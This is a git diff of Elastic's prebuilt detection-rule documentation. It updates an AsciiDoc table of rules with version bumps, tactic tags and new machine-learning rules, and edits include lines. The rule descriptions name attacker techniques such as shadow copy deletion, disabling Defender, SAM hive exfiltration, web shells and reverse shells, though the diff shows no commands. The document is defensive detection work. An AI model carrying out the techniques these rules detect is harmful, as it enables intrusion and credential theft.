unexpected executable file being created or modified by a Windows system critical process, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<unusual-file-creation-alternate-data-stream, Unusual File Creation - Alternate Data Stream>> |Identifies suspicious creation of Alternate Data Streams on highly targeted files. This is uncommon for legitimate files and sometimes done by adversaries to hide malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |111 -|<<unusual-file-modification-by-dns-exe, Unusual File Modification by dns.exe>> |Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |106 +|<<unusual-file-modification-by-dns-exe, Unusual File Modification by dns.exe>> |Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |107 |<<unusual-hour-for-a-user-to-logon, Unusual Hour for a User to Logon>> |A machine learning job detected a user logging in at a time of day that is unusual for the user. This can be due to credentialed access via a compromised account when the user and the threat actor are in different time zones. In addition, unauthorized user activity often takes place during non-business hours. |[Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Initial Access], [Resources: Investigation Guide] |8.3.0 |104 @@ -1802,7 +1876,7 @@ and their rule type is `machine_learning`. |<<unusual-login-activity, Unusual Login Activity>> |Identifies an unusually high number of authentication attempts. |[Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Credential Access] |8.3.0 |103 -|<<unusual-network-activity-from-a-windows-system-binary, Unusual Network Activity from a Windows System Binary>> |Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<unusual-network-activity-from-a-windows-system-binary, Unusual Network Activity from a Windows System Binary>> |Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 |<<unusual-network-connection-via-dllhost, Unusual Network Connection via DllHost>> |Identifies unusual instances of dllhost.exe making outbound network connections. This may indicate adversarial Command and Control activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 @@ -1814,7 +1888,7 @@ and their rule type is `machine_learning`. |<<unusual-parent-child-relationship, Unusual Parent-Child Relationship>> |Identifies Windows programs run from unexpected parent processes. This could indicate masquerading or other strange activity on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<unusual-persistence-via-services-registry, Unusual Persistence via Services Registry>> |Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<unusual-persistence-via-services-registry, Unusual Persistence via Services Registry>> |Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<unusual-print-spooler-child-process, Unusual Print Spooler Child Process>> |Detects unusual Print Spooler service (spoolsv.exe) child processes. This may indicate an attempt to exploit privilege escalation vulnerabilities related to the Printing Service on Windows. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |104 @@ -1822,9 +1896,9 @@ and their rule type is `machine_learning`. |<<unusual-process-execution-on-wbem-path, Unusual Process Execution on WBEM Path>> |Identifies unusual processes running from the WBEM path, uncommon outside WMI-related Windows processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<unusual-process-extension, Unusual Process Extension>> |Identifies processes running with unusual extensions that are not typically valid for Windows executables. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<unusual-process-extension, Unusual Process Extension>> |Identifies processes running with unusual extensions that are not typically valid for Windows executables. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 -|<<unusual-process-for-mssql-service-accounts, Unusual Process For MSSQL Service Accounts>> |Identifies unusual process executions using MSSQL Service accounts, which can indicate the exploitation/compromise of SQL instances. Attackers may exploit exposed MSSQL instances for initial access or lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<unusual-process-for-mssql-service-accounts, Unusual Process For MSSQL Service Accounts>> |Identifies unusual process executions using MSSQL Service accounts, which can indicate the exploitation/compromise of SQL instances. Attackers may exploit exposed MSSQL instances for initial access or lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Persistence], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 |<<unusual-process-for-a-linux-host, Unusual Process For a Linux Host>> |Identifies rare processes that do not usually run on individual hosts, which can indicate execution of unauthorized services, malware, or persistence mechanisms. Processes are considered rare when they only run occasionally as compared with other processes running on the host. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Persistence] |8.3.0 |104 @@ -1832,13 +1906,21 @@ and their rule type is `machine_learning`. |<<unusual-process-network-connection, Unusual Process Network Connection>> |Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<unusual-process-spawned-by-a-host, Unusual Process Spawned by a Host>> |A machine learning job has detected a suspicious Windows process. This process has been classified as suspicious in two ways. It was predicted to be suspicious by the ProblemChild supervised ML model, and it was found to be an unusual process, on a host that does not commonly manifest malicious activity. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. |[Domain: Endpoint], [OS: Windows], [Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + +|<<unusual-process-spawned-by-a-parent-process, Unusual Process Spawned by a Parent Process>> |A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be an unusual child process name, for the parent process, by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. |[Domain: Endpoint], [OS: Windows], [Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + +|<<unusual-process-spawned-by-a-user, Unusual Process Spawned by a User>> |A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be suspicious given that its user context is unusual and does not commonly manifest malicious activity,by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. |[Domain: Endpoint], [OS: Windows], [Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + +|<<unusual-process-writing-data-to-an-external-device, Unusual Process Writing Data to an External Device>> |A machine learning job has detected a rare process writing data to an external device. Malicious actors often use benign-looking processes to mask their data exfiltration activities. The discovery of such a process that has no legitimate reason to write data to external devices can indicate exfiltration. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration] |8.9.0 |1 + |<<unusual-remote-file-directory, Unusual Remote File Directory>> |An anomaly detection job has detected a remote file transfer on an unusual directory indicating a potential lateral movement activity on the host. Many Security solutions monitor well-known directories for suspicious activities, so attackers might use less common directories to bypass monitoring. |[Use Case: Lateral Movement Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Lateral Movement] |8.9.0 |1 |<<unusual-remote-file-extension, Unusual Remote File Extension>> |An anomaly detection job has detected a remote file transfer with a rare extension, which could indicate potential lateral movement activity on the host. |[Use Case: Lateral Movement Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Lateral Movement] |8.9.0 |1 |<<unusual-remote-file-size, Unusual Remote File Size>> |A machine learning job has detected an unusually high file size shared by a remote host indicating potential lateral movement activity. One of the primary goals of attackers after gaining access to a network is to locate and exfiltrate valuable information. Instead of multiple small transfers that can raise alarms, attackers might choose to bundle data into a single large file transfer. |[Use Case: Lateral Movement Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Lateral Movement] |8.9.0 |1 -|<<unusual-service-host-child-process-childless-service, Unusual Service Host Child Process - Childless Service>> |Identifies unusual child processes of Service Host (svchost.exe) that traditionally do not spawn any child processes. This may indicate a code injection or an equivalent form of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<unusual-service-host-child-process-childless-service, Unusual Service Host Child Process - Childless Service>> |Identifies unusual child processes of Service Host (svchost.exe) that traditionally do not spawn any child processes. This may indicate a code injection or an equivalent form of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<unusual-source-ip-for-a-user-to-logon-from, Unusual Source IP for a User to Logon from>> |A machine learning job detected a user logging in from an IP address that is unusual for the user. This can be due to credentialed access via a compromised account when the user and the threat actor are in different locations. An unusual source IP address for a username could also be due to lateral movement when a compromised account is used to pivot between hosts. |[Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Initial Access] |8.3.0 |103 @@ -1846,7 +1928,7 @@ and their rule type is `machine_learning`. |<<unusual-time-or-day-for-an-rdp-session, Unusual Time or Day for an RDP Session>> |A machine learning job has detected an RDP session started at an usual time or weekday. An RDP session at an unusual time could be followed by other suspicious activities, so catching this is a good first step in detecting a larger attack. |[Use Case: Lateral Movement Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Lateral Movement] |8.9.0 |1 -|<<unusual-user-privilege-enumeration-via-id, Unusual User Privilege Enumeration via id>> |This rule monitors for a sequence of 20 "id" command executions within 1 second by the same parent process. This behavior is unusual, and may be indicative of the execution of an enumeration script such as LinPEAS or LinEnum. These scripts leverage the "id" command to enumerate the privileges of all users present on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.3.0 |1 +|<<unusual-user-privilege-enumeration-via-id, Unusual User Privilege Enumeration via id>> |This rule monitors for a sequence of 20 "id" command executions within 1 second by the same parent process. This behavior is unusual, and may be indicative of the execution of an enumeration script such as LinPEAS or LinEnum. These scripts leverage the "id" command to enumerate the privileges of all users present on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.3.0 |2 |<<unusual-web-request, Unusual Web Request>> |A machine learning job detected a rare and unusual URL that indicates unusual web browsing activity. This can be due to initial access, persistence, command-and-control, or exfiltration activity. For example, in a strategic web compromise or watering hole attack, when a trusted website is compromised to target a particular sector or organization, targeted users may receive emails with uncommon URLs for trusted websites. These URLs can be used to download and run a payload. When malware is already running, it may send requests to uncommon URLs on trusted websites the malware uses for command-and-control communication. When rare URLs are observed being requested for a local web server by a remote source, these can be due to web scanning, enumeration or attack traffic, or they can be due to bots and web scrapers which are part of common Internet background traffic. |[Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Command and Control] |8.3.0 |103 @@ -1882,7 +1964,7 @@ and their rule type is `machine_learning`. |<<vnc-virtual-network-computing-to-the-internet, VNC (Virtual Network Computing) to the Internet>> |This rule detects network events that may indicate the use of VNC traffic to the Internet. VNC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Command and Control], [Domain: Endpoint], [Use Case: Threat Detection] |8.3.0 |104 -|<<virtual-machine-fingerprinting, Virtual Machine Fingerprinting>> |An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<virtual-machine-fingerprinting, Virtual Machine Fingerprinting>> |An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<virtual-machine-fingerprinting-via-grep, Virtual Machine Fingerprinting via Grep>> |An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware. |[Domain: Endpoint], [OS: macOS], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.3.0 |103 @@ -1890,19 +1972,19 @@ and their rule type is `machine_learning`. |<<volume-shadow-copy-deleted-or-resized-via-vssadmin, Volume Shadow Copy Deleted or Resized via VssAdmin>> |Identifies use of vssadmin.exe for shadow copy deletion or resizing on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<volume-shadow-copy-deletion-via-powershell, Volume Shadow Copy Deletion via PowerShell>> |Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve shadow copy deletion. This commonly occurs in tandem with ransomware or other destructive attacks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<volume-shadow-copy-deletion-via-powershell, Volume Shadow Copy Deletion via PowerShell>> |Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve shadow copy deletion. This commonly occurs in tandem with ransomware or other destructive attacks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<volume-shadow-copy-deletion-via-wmic, Volume Shadow Copy Deletion via WMIC>> |Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<volume-shadow-copy-deletion-via-wmic, Volume Shadow Copy Deletion via WMIC>> |Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<wmi-incoming-lateral-movement, WMI Incoming Lateral Movement>> |Identifies processes executed via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement, but could be noisy if administrators use WMI to remotely manage hosts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |107 +|<<wmi-incoming-lateral-movement, WMI Incoming Lateral Movement>> |Identifies processes executed via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement, but could be noisy if administrators use WMI to remotely manage hosts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |108 |<<wmi-wbemtest-utility-execution, WMI WBEMTEST Utility Execution>> |Adversaries may abuse the WMI diagnostic tool, wbemtest.exe, to enumerate WMI object instances or invoke methods against local or remote endpoints. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<wmic-remote-command, WMIC Remote Command>> |Identifies the use of wmic.exe to run commands on remote hosts. While this can be used by administrators legitimately, attackers can abuse this built-in utility to achieve lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<wmic-remote-command, WMIC Remote Command>> |Identifies the use of wmic.exe to run commands on remote hosts. While this can be used by administrators legitimately, attackers can abuse this built-in utility to achieve lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 |<<wpad-service-exploit, WPAD Service Exploit>> |Identifies probable exploitation of the Web Proxy Auto-Discovery Protocol (WPAD) service. Attackers who have access to the local network or upstream DNS traffic can inject malicious JavaScript to the WPAD service which can lead to a full system compromise. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |None |1 -|<<writedac-access-on-active-directory-object, WRITEDAC Access on Active Directory Object>> |Identifies the access on an object with WRITEDAC permissions. With the WRITEDAC permission, the user can perform a Write Discretionary Access Control List (WriteDACL) operation, which is used to modify the access control rules associated with a specific object within Active Directory. Attackers may abuse this privilege to grant themselves or other compromised accounts additional rights, ultimately compromising the target object, resulting in privilege escalation, lateral movement, and persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Active Directory], [Use Case: Active Directory Monitoring], [Rule Type: BBR] |8.3.0 |1 +|<<writedac-access-on-active-directory-object, WRITEDAC Access on Active Directory Object>> |Identifies the access on an object with WRITEDAC permissions. With the WRITEDAC permission, the user can perform a Write Discretionary Access Control List (WriteDACL) operation, which is used to modify the access control rules associated with a specific object within Active Directory. Attackers may abuse this privilege to grant themselves or other compromised accounts additional rights, ultimately compromising the target object, resulting in privilege escalation, lateral movement, and persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Active Directory], [Use Case: Active Directory Monitoring], [Rule Type: BBR] |8.3.0 |2 |<<web-application-suspicious-activity-post-request-declined, Web Application Suspicious Activity: POST Request Declined>> |A POST request to a web application returned a 403 response, which indicates the web application declined to process the request because the action requested was not allowed. |[Data Source: APM] |8.3.0 |102 @@ -1910,7 +1992,7 @@ and their rule type is `machine_learning`. |<<web-application-suspicious-activity-sqlmap-user-agent, Web Application Suspicious Activity: sqlmap User Agent>> |This is an example of how to detect an unwanted web client user agent. This search matches the user agent for sqlmap 1.3.11, which is a popular FOSS tool for testing web applications for SQL injection vulnerabilities. |[Data Source: APM] |8.3.0 |102 -|<<web-shell-detection-script-process-child-of-common-web-processes, Web Shell Detection: Script Process Child of Common Web Processes>> |Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<web-shell-detection-script-process-child-of-common-web-processes, Web Shell Detection: Script Process Child of Common Web Processes>> |Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Initial Access], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<webproxy-settings-modification, WebProxy Settings Modification>> |Identifies the use of the built-in networksetup command to configure webproxy settings. This may indicate an attempt to hijack web browser traffic for credential access via traffic sniffing or redirection. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |104 @@ -1924,21 +2006,23 @@ and their rule type is `machine_learning`. |<<windows-cryptoapi-spoofing-vulnerability-cve-2020-0601-curveball, Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601 - CurveBall)>> |A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Use Case: Vulnerability] |8.3.0 |103 -|<<windows-defender-disabled-via-registry-modification, Windows Defender Disabled via Registry Modification>> |Identifies modifications to the Windows Defender registry settings to disable the service or set the service to be started manually. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<windows-defender-disabled-via-registry-modification, Windows Defender Disabled via Registry Modification>> |Identifies modifications to the Windows Defender registry settings to disable the service or set the service to be started manually. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<windows-defender-exclusions-added-via-powershell, Windows Defender Exclusions Added via PowerShell>> |Identifies modifications to the Windows Defender configuration settings using PowerShell to add exclusions at the folder directory or process level. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<windows-event-logs-cleared, Windows Event Logs Cleared>> |Identifies attempts to clear Windows event log stores. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide] |8.3.0 |107 -|<<windows-firewall-disabled-via-powershell, Windows Firewall Disabled via PowerShell>> |Identifies when the Windows Firewall is disabled using PowerShell cmdlets, which can help attackers evade network constraints, like internet and network lateral communication restrictions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<windows-firewall-disabled-via-powershell, Windows Firewall Disabled via PowerShell>> |Identifies when the Windows Firewall is disabled using PowerShell cmdlets, which can help attackers evade network constraints, like internet and network lateral communication restrictions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 + +|<<windows-installer-with-suspicious-properties, Windows Installer with Suspicious Properties>> |Identifies the execution of an installer from an archive or with suspicious properties. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files in an attempt to bypass application whitelisting. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 -|<<windows-network-enumeration, Windows Network Enumeration>> |Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |107 +|<<windows-network-enumeration, Windows Network Enumeration>> |Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |108 |<<windows-registry-file-creation-in-smb-share, Windows Registry File Creation in SMB Share>> |Identifies the creation or modification of a medium-size registry hive file on a Server Message Block (SMB) share, which may indicate an exfiltration attempt of a previously dumped Security Account Manager (SAM) registry hive for credential extraction on an attacker-controlled system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 -|<<windows-script-executing-powershell, Windows Script Executing PowerShell>> |Identifies a PowerShell process launched by either cscript.exe or wscript.exe. Observing Windows scripting processes executing a PowerShell script, may be indicative of malicious activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<windows-script-executing-powershell, Windows Script Executing PowerShell>> |Identifies a PowerShell process launched by either cscript.exe or wscript.exe. Observing Windows scripting processes executing a PowerShell script, may be indicative of malicious activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<windows-script-interpreter-executing-process-via-wmi, Windows Script Interpreter Executing Process via WMI>> |Identifies use of the built-in Windows script interpreters (cscript.exe or wscript.exe) being used to execute a process via Windows Management Instrumentation (WMI). This may be indicative of malicious activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<windows-script-interpreter-executing-process-via-wmi, Windows Script Interpreter Executing Process via WMI>> |Identifies use of the built-in Windows script interpreters (cscript.exe or wscript.exe) being used to execute a process via Windows Management Instrumentation (WMI). This may be indicative of malicious activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<windows-service-installed-via-an-unusual-client, Windows Service Installed via an Unusual Client>> |Identifies the creation of a Windows service by an unusual client process. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation] |8.3.0 |105 diff --git a/docs/detections/prebuilt-rules/rule-desc-index.asciidoc b/docs/detections/prebuilt-rules/rule-desc-index.asciidoc index 3b4c7b0b3d..a2e63e0fdb 100644 --- a/docs/detections/prebuilt-rules/rule-desc-index.asciidoc +++ b/docs/detections/prebuilt-rules/rule-desc-index.asciidoc @@ -84,6 +84,7 @@ include::rule-details/apple-script-execution-followed-by-network-connection.asci include::rule-details/apple-scripting-execution-with-administrator-privileges.asciidoc[] include::rule-details/application-added-to-google-workspace-domain.asciidoc[] include::rule-details/application-removed-from-blocklist-in-google-workspace.asciidoc[] +include::rule-details/archive-file-with-unusual-extension.asciidoc[] include::rule-details/at-exe-command-lateral-movement.asciidoc[] include::rule-details/attempt-to-create-okta-api-token.asciidoc[] include::rule-details/attempt-to-deactivate-mfa-for-an-okta-user-account.asciidoc[] @@ -197,10 +198,10 @@ include::rule-details/cyberark-privileged-access-security-recommended-monitor.as include::rule-details/dns-tunneling.asciidoc[] include::rule-details/dns-over-https-enabled-via-registry.asciidoc[] include::rule-details/default-cobalt-strike-team-server-certificate.asciidoc[] +include::rule-details/delayed-execution-via-ping.asciidoc[] include::rule-details/delete-volume-usn-journal-with-fsutil.asciidoc[] include::rule-details/deleting-backup-catalogs-with-wbadmin.asciidoc[] -include::rule-details/deprecated-potential-dns-tunneling-via-iodine.asciidoc[] -include::rule-details/deprecated-potential-process-injection-via-ld-preload-environment-variable.asciidoc[] +include::rule-details/deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc[] include::rule-details/direct-outbound-smb-connection.asciidoc[] 